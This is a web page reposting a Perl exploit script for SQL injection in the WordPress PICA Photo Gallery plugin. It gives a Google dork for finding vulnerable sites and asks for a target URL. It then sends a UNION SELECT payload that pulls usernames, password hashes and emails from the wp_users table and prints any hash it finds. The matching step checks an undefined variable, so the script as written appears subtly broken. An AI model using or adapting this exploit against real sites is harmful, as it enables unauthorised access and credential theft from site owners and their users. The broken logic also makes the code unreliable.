Skip to main content

WordPress - PICA Photo Gallery Automatic SQL Injection (perl)

# Exploit title: WordPress - PICA Photo Gallery Automatic SQL Injection (perl)
# Author: D35m0nd142
# Software Link: http://www.apptha.co...A-Photo-Gallery
# Google Dork: intext:"Powered by Apptha." inurl:gallery
# Thanks to Da0ne


#!/usr/bin/perl  
use LWP::UserAgent;
system("clear");
print "***********************************************\n";
print "* WordPress - PICA Photo Gallery SQLi exploit *\n";
print "*                 Created by D35m0nd142                     *\n";
print "***********************************************\n\n";
print "Enter the target --> ";
chomp(my $target=<STDIN>);
$table_name="wp_users";
$agent = LWP::UserAgent->new() or die "Error!\n";
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
$host = $target . "/pica-gallery/?aid=-1+union+select+concat(user_login,0x3a,user_pass,0x3a,user_email),2,3,4+from+wp_users-";
$request = $agent->request(HTTP::Request->new(GET=>$host));
$result = $request->content;
if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
print "No password found :(\n";
}

Share this with your friends
Loading...